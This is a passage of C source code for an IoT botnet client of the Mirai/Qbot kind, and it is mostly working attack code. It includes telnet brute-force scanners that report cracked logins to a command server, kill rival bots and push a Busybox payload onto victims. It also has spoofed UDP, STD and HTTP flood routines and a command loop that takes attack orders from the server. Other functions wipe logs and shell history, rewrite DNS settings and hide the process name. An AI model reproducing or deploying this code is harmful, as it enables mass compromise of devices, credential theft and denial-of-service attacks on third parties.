2534. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
2535. fds[i].tTimeout = time(NULL);
2536. if (contains_fail(fds[i].sockbuf)) {
2537. fds[i].state = 0;
2538. } else {
2539. sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2540. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2541. fds[i].state = 7;
2542. } continue; }
2543. if (fds[i].tTimeout + 6 < time(NULL)) {
2544. fds[i].state = 0;
2545. fds[i].complete = 1;
2546. }
2547. }
2548. break;
2549. case 7: {
2550. char RemoveTheTempDirs [80];
2551. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2552. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2553. RemoveTempDirs();
2554. sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2555. char killtheproccesses[80];
2556. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2557. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2558. sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2559. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2560. fds[i].state = 0;
2561. fds[i].complete = 1;
2562. continue; }
2563. fds[i].state = 8;
2564. }
2565. break;
2566. case 8: {
2567. fds[i].tTimeout = time(NULL);
2568. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2569. sclose(fds[i].fd);
2570. fds[i].state = 0;
2571. fds[i].complete = 1;
2572. continue; }
2573. fds[i].complete = 3;
2574. if(fds[i].tTimeout + 60 < time(NULL)) {
2575. if(fds[i].complete !=3){
2576. }
2577. fds[i].state = 0;
2578. fds[i].complete = 1;
2579. }
2580. break;
2581. }
2582. }
2583. }
2584. }
2585. }
2586. void MiraiHackaShit() {
2587. char buf[128];
2588. int max = 256, i, res, valopt;
2589. fd_set fdset;
2590. struct timeval tv;
2591. socklen_t lon;
2592. srand(time(NULL) ^ rand_cmwc());
2593. struct sockaddr_in dest_addr;
2594. dest_addr.sin_family = AF_INET;
2595. dest_addr.sin_port = htons(23);
2596. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2597. struct telstate_t fds[max];
2598. memset(fds, 0, max * (sizeof(int) + 1));
2599. for(i = 0; i < max; i++) {
2600. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2601. fds[i].complete = 1;
2602. fds[i].sockbuf = malloc(256 + 1); }
2603. while(1) {
2604. for(i = 0; i < max; i++) {
2605. if(fds[i].tTimeout == 0) {
2606. fds[i].tTimeout = time(NULL); }
2607. switch(fds[i].state) {
2608. case 0: {
2609. if(fds[i].complete) {
2610. char *tmp = fds[i].sockbuf;
2611. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2612. fds[i].sockbuf = tmp;
2613. fds[i].ip = MiraiIPRanges(); }
2614. else  {
2615. fds[i].passwordInd++;
2616. fds[i].usernameInd++;
2617. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
2618. fds[i].complete = 1;
2619. continue; }
2620. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
2621. fds[i].complete = 1;
2622. continue;
2623. }
2624. }
2625. dest_addr.sin_family = AF_INET;
2626. dest_addr.sin_port = htons(23);
2627. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2628. dest_addr.sin_addr.s_addr = fds[i].ip;
2629. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2630. if(fds[i].fd == -1) continue;
2631. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2632. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
2633. sclose(fds[i].fd);
2634. fds[i].complete = 1; }
2635. else {
2636. fds[i].state = 1;
2637. fds[i].tTimeout = 0;
2638. }
2639. }
2640. break;
2641. case 1: {
2642. FD_ZERO(&fdset);
2643. FD_SET(fds[i].fd, &fdset);
2644. tv.tv_sec = 0;
2645. tv.tv_usec = 10000;
2646. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2647. if(res == 1) {
2648. lon = sizeof(int);
2649. valopt = 0;
2650. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2651. if(valopt) {
2652. sclose(fds[i].fd);
2653. fds[i].state = 0;
2654. fds[i].complete = 1;
2655. } else {
2656. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2657. fds[i].tTimeout = 0;
2658. fds[i].bufUsed = 0;
2659. memset(fds[i].sockbuf, 0, 256);
2660. fds[i].state = 2;
2661. } continue; }
2662. else if(res == -1) {
2663. sclose(fds[i].fd);
2664. fds[i].state = 0;
2665. fds[i].complete = 1;
2666. continue; }
2667. if(fds[i].tTimeout + 6 < time(NULL)) {
2668. sclose(fds[i].fd);
2669. fds[i].state = 0;
2670. fds[i].complete = 1;
2671. }
2672. }
2673. break;
2674. case 2: {
2675. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
2676. if(contains_fail(fds[i].sockbuf)) {
2677. fds[i].state = 0;
2678. } else {
2679. fds[i].state = 3; }
2680. continue; }
2681. if(fds[i].tTimeout + 6 < time(NULL)) {
2682. fds[i].state = 0;
2683. fds[i].complete = 1;
2684. }
2685. }
2686. break;
2687. case 3: {
2688. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
2689. fds[i].state = 0;
2690. fds[i].complete = 1;
2691. continue; }
2692. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2693. fds[i].state = 0;
2694. fds[i].complete = 1;
2695. continue; }
2696. fds[i].state = 4; }
2697. break;
2698. case 4: {
2699. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
2700. {
2701. if(contains_fail(fds[i].sockbuf)) {
2702. fds[i].state = 0;
2703. } else {
2704. fds[i].state = 5; }
2705. continue; }
2706. if(fds[i].tTimeout + 6 < time(NULL)) {
2707. fds[i].state = 0;
2708. fds[i].complete = 1;
2709. }
2710. }
2711. break;
2712. case 5: {
2713. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
2714. fds[i].state = 0;
2715. fds[i].complete = 1;
2716. continue; }
2717. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2718. fds[i].state = 0;
2719. fds[i].complete = 1;
2720. continue; }
2721. fds[i].state = 6;
2722. }
2723. break;
2724. case 6: {
2725. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
2726. fds[i].tTimeout = time(NULL);
2727. if (contains_fail(fds[i].sockbuf)) {
2728. fds[i].state = 0;
2729. } else {
2730. sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2731. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2732. fds[i].state = 7;
2733. } continue; }
2734. if (fds[i].tTimeout + 6 < time(NULL)) {
2735. fds[i].state = 0;
2736. fds[i].complete = 1;
2737. }
2738. }
2739. break;
2740. case 7: {
2741. char RemoveTheTempDirs [80];
2742. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2743. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2744. RemoveTempDirs();
2745. sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2746. char killtheproccesses[80];
2747. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2748. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2749. sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2750. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2751. fds[i].state = 0;
2752. fds[i].complete = 1;
2753. continue; }
2754. fds[i].state = 8;
2755. }
2756. break;
2757. case 8: {
2758. fds[i].tTimeout = time(NULL);
2759. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2760. sclose(fds[i].fd);
2761. fds[i].state = 0;
2762. fds[i].complete = 1;
2763. continue; }
2764. fds[i].complete = 3;
2765. if(fds[i].tTimeout + 60 < time(NULL)) {
2766. if(fds[i].complete !=3){
2767. }
2768. fds[i].state = 0;
2769. fds[i].complete = 1;
2770. }
2771. break;
2772. }
2773. }
2774. }
2775. }
2776. }
2777. void SendSTD(unsigned char *ip, int port, int secs) {
2778.     int iSTD_Sock;
2779.     iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
2780.     time_t start = time(NULL);
2781.     struct sockaddr_in sin;
2782.     struct hostent *hp;
2783.     hp = gethostbyname(ip);
2784.     bzero((char*) &sin,sizeof(sin));
2785.     bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
2786.     sin.sin_family = hp->h_addrtype;
2787.     sin.sin_port = port;
2788.     unsigned int a = 0;
2789.     while(1){
2790.         if (a >= 50) {
2791.             send(iSTD_Sock, "std", 69, 0);
2792.             connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
2793.             if (time(NULL) >= start + secs) {
2794.                 close(iSTD_Sock);
2795.                 _exit(0);
2796.             }
2797.             a = 0;
2798.         }
2799.         a++;
2800.     }
2801. }
2802. void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
2803.         struct sockaddr_in dest_addr;
2804.         dest_addr.sin_family = AF_INET;
2805.         if(port == 0) dest_addr.sin_port = rand_cmwc();
2806.         else dest_addr.sin_port = htons(port);
2807.         if(getHost(target, &dest_addr.sin_addr)) return;
2808.         memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2809.         register unsigned int pollRegister;
2810.         pollRegister = pollinterval;   
2811.                 int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
2812.                 if(!sockfd) {
2813.                         return;
2814.                 }
2815.                 int tmp = 1;
2816.                 if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
2817.                         return;
2818.                 }
2819.                 int counter = 50;
2820.                 while(counter--) {
2821.                         srand(time(NULL) ^ rand_cmwc());
2822.                         init_rand(rand());
2823.                 }
2824.                 in_addr_t netmask;
2825.                 netmask = ( ~((1 << (32 - spoofit)) - 1) );
2826.                 unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
2827.                 struct iphdr *iph = (struct iphdr *)packet;
2828.                 struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
2829.                 makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
2830.                 udph->len = htons(sizeof(struct udphdr) + packetsize);
2831.                 udph->source = rand_cmwc();
2832.                 udph->dest = (port == 0 ? rand_cmwc() : htons(port));
2833.                 udph->check = 0;
2834.                 makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
2835.                 iph->check = csum ((unsigned short *) packet, iph->tot_len);
2836.                 int end = time(NULL) + timeEnd;
2837.                 register unsigned int i = 0;
2838.                 while(1) {
2839.                         sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
2840.                         udph->source = rand_cmwc();
2841.                         udph->dest = (port == 0 ? rand_cmwc() : htons(port));
2842.                         iph->id = rand_cmwc();
2843.                         iph->saddr = htonl( getRandomIP(netmask) );
2844.                         iph->check = csum ((unsigned short *) packet, iph->tot_len);
2845.                         if(i == pollRegister) {
2846.                                 if(time(NULL) > end) break;
2847.                                 i = 0;
2848.                                 continue;
2849.                         }
2850.                         i++;
2851.                 }
2852.         }
2853. int socket_connect(char *host, in_port_t port) {
2854.     struct hostent *hp;
2855.     struct sockaddr_in addr;
2856.     int on = 1, sock;    
2857.     if ((hp = gethostbyname(host)) == NULL) return 0;
2858.     bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
2859.     addr.sin_port = htons(port);
2860.     addr.sin_family = AF_INET;
2861.     sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
2862.     setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
2863.     if (sock == -1) return 0;
2864.     if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
2865.     return sock;
2866. }
2867. void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
2868.     int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
2869.     char request[512], buffer[1];
2870.     for (i = 0; i < power; i++) {
2871.         sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
2872.         if (fork()) {
2873.             while (end > time(NULL)) {
2874.                 socket = socket_connect(host, port);
2875.                 if (socket != 0) {
2876.                     write(socket, request, strlen(request));
2877.                     read(socket, buffer, 1);
2878.                     close(socket);
2879.                 }
2880.             }
2881.             exit(0);
2882.         }
2883.     }
2884. }
2885. void ClearHistory()
2886. {
2887.     system("history -c;history -w");
2888.     system("cd /;rm -rf ~/.bash_history");
2889. }
2890. void processCmd(int argc, unsigned char *argv[]) {
2891.         if(!strcmp(argv[0], "TELNET"))
2892.         {
2893.             if(!strcmp(argv[1], "ON"))
2894.             {
2895.                 uint32_t parent;
2896.                 parent = fork();        
2897.                 int ii = 0;
2898.                 int forks = sysconf( _SC_NPROCESSORS_ONLN );
2899.                 int fds = 999999;
2900.                 if(forks == 1) fds = 500;
2901.                 if(forks >= 2) fds = 1000;
2902.                 if (parent > 0)
2903.                 {
2904.                     scanPid = parent;
2905.                     return;
2906.                 }
2907.                 else if(parent == -1) return;
2908.                 for (ii = 0; ii < forks; ii++)
2909.                 {
2910.                     srand((time(NULL) ^ getpid()) + getppid());
2911.                     init_rand(time(NULL) ^ getpid());
2912.                     TelnetScanner(100, fds);
2913.                     _exit(0);
2914.                 }
2915.             }
2916.             if(!strcmp(argv[1], "OFF"))
2917.             {
2918.                 if(scanPid == 0) return;
2919.                 kill(scanPid, 9);
2920.                 scanPid = 0;
2921.             }
2922.             if(!strcmp(argv[1], "FASTLOAD"))
2923.             {
2924.                 int threads = atoi(argv[1]);
2925.                 int usec = atoi(argv[2]);
2926.                 if(!listFork())
2927.                 {
2928.                     //sockprintf(mainCommSock, "[TELNET] Starting Fastload.");
2929.                     TelnetScanner(usec, threads);
2930.                     _exit(0);
2931.                 }
2932.                 return;
2933.             }
2934.         }
2935.         if(!strcmp(argv[0], "MIRAI"))
2936.         {
2937.             if(!strcmp(argv[1], "ON"))
2938.             {
2939.                 uint32_t parent;
2940.                 parent = fork();        
2941.                 int ii = 0;
2942.                 int forks = sysconf( _SC_NPROCESSORS_ONLN );
2943.                 int fds = 999999;
2944.                 if(forks == 1) fds = 500;
2945.                 if(forks >= 2) fds = 1000;
2946.                 if (parent > 0)
2947.                 {
2948.                     miraiPid = parent;
2949.                     return;
2950.                 }
2951.                 else if(parent == -1) return;
2952.                 for (ii = 0; ii < forks; ii++)
2953.                 {
2954.                     srand((time(NULL) ^ getpid()) + getppid());
2955.                     init_rand(time(NULL) ^ getpid());
2956.                     MiraiScanner(100, fds);
2957.                     _exit(0);
2958.                 }
2959.             }
2960.             if(!strcmp(argv[1], "OFF"))
2961.             {
2962.                 if(miraiPid == 0) return;
2963.                 kill(miraiPid, 9);
2964.                 miraiPid = 0;
2965.             }
2966.             if(!strcmp(argv[1], "FASTLOAD"))
2967.             {
2968.                 int threads = atoi(argv[1]);
2969.                 int usec = atoi(argv[2]);
2970.                 if(!listFork())
2971.                 {
2972.                     //sockprintf(mainCommSock, "Starting scanner!!");
2973.                     MiraiScanner(usec, threads);
2974.                     _exit(0);
2975.                 }
2976.                 return;
2977.             }
2978. }
2979. if(!strcmp(argv[0], "PHONE")) {
2980. if(argc != 2) {
2981. return; }
2982. if(!strcmp(argv[1], "OFF")) {
2983. if(Phonepid == 0) return;
2984. kill(Phonepid, 9);
2985. Phonepid = 0; }
2986. if(!strcmp(argv[1], "ON")) {
2987. if(Phonepid != 0) return;
2988. uint32_t parent;
2989. parent = fork();
2990. if (parent > 0) { Phonepid = parent; return;}
2991. else if(parent == -1) return;
2992. PhoneScanner();
2993. _exit(0);
2994. }
2995. }
2996. if(!strcmp(argv[0], "MIRAITEST")) {
2997. if(argc != 2) {
2998. return; }
2999. if(!strcmp(argv[1], "OFF")) {
3000. if(testmiraiPid == 0) return;
3001. kill(testmiraiPid, 9);
3002. testmiraiPid = 0; }
3003. if(!strcmp(argv[1], "ON")) {
3004. if(testmiraiPid != 0) return;
3005. uint32_t parent;
3006. parent = fork();
3007. if (parent > 0) { testmiraiPid = parent; return;}
3008. else if(parent == -1) return;
3009. MiraiHackaShit();
3010. _exit(0);
3011. }
3012. }
3013. if(!strcmp(argv[0], "TELNETTEST")) {
3014. if(argc != 2) {
3015. return; }
3016. if(!strcmp(argv[1], "OFF")) {
3017. if(testtelnetPid == 0) return;
3018. kill(testtelnetPid, 9);
3019. testtelnetPid = 0; }
3020. if(!strcmp(argv[1], "ON")) {
3021. if(testtelnetPid != 0) return;
3022. uint32_t parent;
3023. parent = fork();
3024. if (parent > 0) { testtelnetPid = parent; return;}
3025. else if(parent == -1) return;
3026. HackaShit();
3027. _exit(0);
3028. }
3029. }
3030. if(!strcmp(argv[0], "BCM")) {
3031. if(argc != 2) {
3032. return; }
3033. if(!strcmp(argv[1], "OFF")) {
3034. if(bcmPid == 0) return;
3035. kill(bcmPid, 9);
3036. bcmPid = 0; }
3037. if(!strcmp(argv[1], "ON")) {
3038. if(bcmPid != 0) return;
3039. uint32_t parent;
3040. parent = fork();
3041. if (parent > 0) { bcmPid = parent; return;}
3042. else if(parent == -1) return;
3043. BCMscanner();
3044. _exit(0);
3045. }
3046. }
3047.    
3048.         if (!strcmp(argv[0], "HTTP"))
3049.         {
3050.             // !* HTTP METHOD TARGET PORT PATH TIME POWER
3051.             // !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
3052.             if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
3053.             if (listFork()) return;
3054.             SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
3055.             exit(0);
3056.         }
3057.         if(!strcmp(argv[0], "UDP"))
3058.         {
3059.             // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
3060.             if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
3061.             {
3062.                 return;
3063.             }
3064.                 unsigned char *ip = argv[1];
3065.                 int port = atoi(argv[2]);
3066.                 int time = atoi(argv[3]);
3067.                 int packetsize = atoi(argv[4]);
3068.                 int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
3069.                 int spoofed = 32;
3070.                 if(strstr(ip, ",") != NULL)
3071.                 {
3072.                     unsigned char *hi = strtok(ip, ",");
3073.                     while(hi != NULL)
3074.                     {
3075.                         if(!listFork())
3076.                         {
3077.                             SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
3078.                             _exit(0);
3079.                         }
3080.                         hi = strtok(NULL, ",");
3081.                     }
3082.                 } else {
3083.                             if (listFork())
3084.                             {
3085.                                 return;
3086.                             }
3087.                             SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
3088.                             _exit(0);
3089.                        }   
3090.         }
3091.         if(!strcmp(argv[0], "STD"))
3092.         {
3093.             //!* STD TARGET PORT TIME
3094.             if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
3095.             {
3096.                 return;
3097.             }
3098.             unsigned char *ip = argv[1];
3099.             int port = atoi(argv[2]);
3100.             int time = atoi(argv[3]);
3101.             if(strstr(ip, ",") != NULL)
3102.             {
3103.                 unsigned char *hi = strtok(ip, ",");
3104.                 while(hi != NULL)
3105.                 {
3106.                     if(!listFork())
3107.                     {
3108.                         SendSTD(hi, port, time);
3109.                         _exit(0);
3110.                     }
3111.                     hi = strtok(NULL, ",");
3112.                 }
3113.             } else {
3114.                         if (listFork())
3115.                         {
3116.                             return;
3117.                         }
3118.                         SendSTD(ip, port, time);
3119.                         _exit(0);
3120.                    }
3121.         }
3122.         if(!strcmp(argv[0], "KILLATTK"))
3123.         {
3124.                 int killed = 0;
3125.                 unsigned long i;
3126.                 for (i = 0; i < numpids; i++)
3127.                 {
3128.                         if (pids[i] != 0 && pids[i] != getpid())
3129.                         {
3130.                                 kill(pids[i], 9);
3131.                                 killed++;
3132.                         }
3133.                 }
3134.                 if(killed > 0)
3135.                 {
3136.                     //
3137.                 } else {
3138.                             //
3139.                        }
3140.         }
3141.         if(!strcmp(argv[0], "LOLNOGTFO"))
3142.         {
3143.                 exit(0);
3144.         }
3145.         if(!strcmp(argv[0], "UPDATE"))
3146.         {
3147.             RemoveTempDirs();
3148.             sockprintf(mainCommSock, "[Updating] [%s:%s]", getBuild(), getEndianness());
3149.         }
3150. }
3151. int initConnection() {
3152. unsigned char server[4096];
3153. memset(server, 0, 4096);
3154. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
3155. if(mainCommSock + 1 == SERVER_LIST_SIZE) mainCommSock = 0;
3156. else mainCommSock++;
3157. strcpy(server, Busybox_Payload[mainCommSock]);
3158. int port = Server_Botport;
3159. if(strchr(server, ':') != NULL) {
3160. port = atoi(strchr(server, ':') + 1);
3161. *((unsigned char *)(strchr(server, ':'))) = 0x0; }
3162. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
3163. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
3164. return 0;
3165. }
3166. void UpdateNameSrvs() {
3167.     uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
3168.     if (access("/etc/resolv.conf", F_OK) != -1) {
3169.         const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
3170.         size_t resl = strlen(resd);
3171.         write(fhandler, resd, resl);
3172.     } else { return; }
3173.     close(fhandler);
3174. }
3175. void RemoveTempDirs() {
3176.     system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
3177.     system("rm -rf /var/log/wtmp");
3178.     system("rm -rf ~/.bash_history");
3179.     system("history -c;history -w");
3180. }
3181. int getEndianness(void)
3182. {
3183.     union
3184.     {
3185.         uint32_t vlu;
3186.         uint8_t data[sizeof(uint32_t)];
3187.     } nmb;
3188.     nmb.data[0] = 0x00;
3189.     nmb.data[1] = 0x01;
3190.     nmb.data[2] = 0x02;
3191.     nmb.data[3] = 0x03;
3192.     switch (nmb.vlu)
3193.     {
3194.         case UINT32_C(0x00010203):
3195.             return "BIG_ENDIAN";
3196.         case UINT32_C(0x03020100):
3197.             return "LITTLE_ENDIAN";
3198.         case UINT32_C(0x02030001):
3199.             return "BIG_ENDIAN_W";
3200.         case UINT32_C(0x01000302):
3201.             return "LITTLE_ENDIAN_W";
3202.         default:
3203.             return "UNKNOWN";
3204.     }
3205. }
3206. int getOurIP() {
3207. int sock = socket(AF_INET, SOCK_DGRAM, 0);
3208. if(sock == -1) return 0;
3209. struct sockaddr_in serv;
3210. memset(&serv, 0, sizeof(serv));
3211. serv.sin_family = AF_INET;
3212. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
3213. serv.sin_port = htons(53);
3214. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
3215. if(err == -1) return 0;
3216. struct sockaddr_in name;
3217. socklen_t namelen = sizeof(name);
3218. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
3219. if(err == -1) return 0;
3220. ourIP.s_addr = name.sin_addr.s_addr;
3221. int cmdline = open("/proc/net/route", O_RDONLY);
3222. char linebuf[4096];
3223. while(fdgets(linebuf, 4096, cmdline) != NULL)
3224. {
3225. if(strstr(linebuf, "\t00000000\t") != NULL)
3226. {
3227. unsigned char *pos = linebuf;
3228. while(*pos != '\t') pos++;
3229. *pos = 0;
3230. break;
3231. }
3232. memset(linebuf, 0, 4096);
3233. }
3234. close(cmdline);
3235. if(*linebuf)
3236. {
3237. int i;
3238. struct ifreq ifr;
3239. strcpy(ifr.ifr_name, linebuf);
3240. ioctl(sock, SIOCGIFHWADDR, &ifr);
3241. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
3242. }
3243. close(sock);
3244. }
3245. int main(int argc, unsigned char *argv[]) {
3246.         const char *lolsuckmekid = "";
3247.         if(SERVER_LIST_SIZE <= 0) return 0;
3248.         strncpy(argv[0],"",strlen(argv[0]));
3249.         argv[0] = "";
3250.         prctl(PR_SET_NAME, (unsigned long) lolsuckmekid, 0, 0, 0);
3251.         srand(time(NULL) ^ getpid());
3252.         init_rand(time(NULL) ^ getpid());
3253.         pid_t pid1;
3254.         pid_t pid2;
3255.         int status;
3256.         getOurIP();
3257.         if (pid1 = fork()) {
3258.                         waitpid(pid1, &status, 0);
3259.                         exit(0);
3260.         } else if (!pid1) {
3261.                         if (pid2 = fork()) {
3262.                                         exit(0);
3263.                         } else if (!pid2) {
3264.                         } else {
3265.                         }
3266.         } else {
3267.         }
3268.         chdir("/");
3269.         setuid(0);             
3270.         seteuid(0);
3271.         signal(SIGPIPE, SIG_IGN);
3272.         while(1) {
3273.                 if(fork() == 0) {
3274.                 if(initConnection()) { sleep(5); continue; }
3275.                 sockprintf(mainCommSock, "[ CONNECTED ] IP: %s || Arch Type: %s || Endianness Type: %s", inet_ntoa(ourIP), getBuild(), getEndianness());
3276.                 UpdateNameSrvs();
3277.                 RemoveTempDirs();
3278.                 char commBuf[4096];
3279.                 int got = 0;
3280.                 int i = 0;
3281.                 while((got = recvLine(mainCommSock, commBuf, 4096)) != -1) {
3282.                         for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
3283.                                 unsigned int *newpids, on;
3284.                                 for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
3285.                                 pids[on - 1] = 0;
3286.                                 numpids--;
3287.                                 newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
3288.                                 for (on = 0; on < numpids; on++) newpids[on] = pids[on];
3289.                                 free(pids);
3290.                                 pids = newpids;
3291.                         }
3292.                         commBuf[got] = 0x00;
3293.                         trim(commBuf);
3294.                         if(strstr(commBuf, "PING") == commBuf) { // PING
3295.                                 continue;
3296.                         }
3297.                         if(strstr(commBuf, "DUP") == commBuf) exit(0); // DUP
3298.                         unsigned char *message = commBuf;
3299.                         if(*message == '!') {
3300.                                 unsigned char *nickMask = message + 1;
3301.                                 while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
3302.                                 if(*nickMask == 0x00) continue;
3303.                                 *(nickMask) = 0x00;
3304.                                 nickMask = message + 1;
3305.                                 message = message + strlen(nickMask) + 2;
3306.                                 while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
3307.                                 unsigned char *command = message;
3308.                                 while(*message != ' ' && *message != 0x00) message++;
3309.                                 *message = 0x00;
3310.                                 message++;
3311.                                 unsigned char *tmpcommand = command;
3312.                                 while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
3313.                                 unsigned char *params[10];
3314.                                 int paramsCount = 1;
3315.                                 unsigned char *pch = strtok(message, " ");
3316.                                 params[0] = command;
3317.                                 while(pch) {
3318.                                         if(*pch != '\n') {
3319.                                                 params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
3320.                                                 memset(params[paramsCount], 0, strlen(pch) + 1);
3321.                                                 strcpy(params[paramsCount], pch);
3322.                                                 paramsCount++;
3323.                                         }
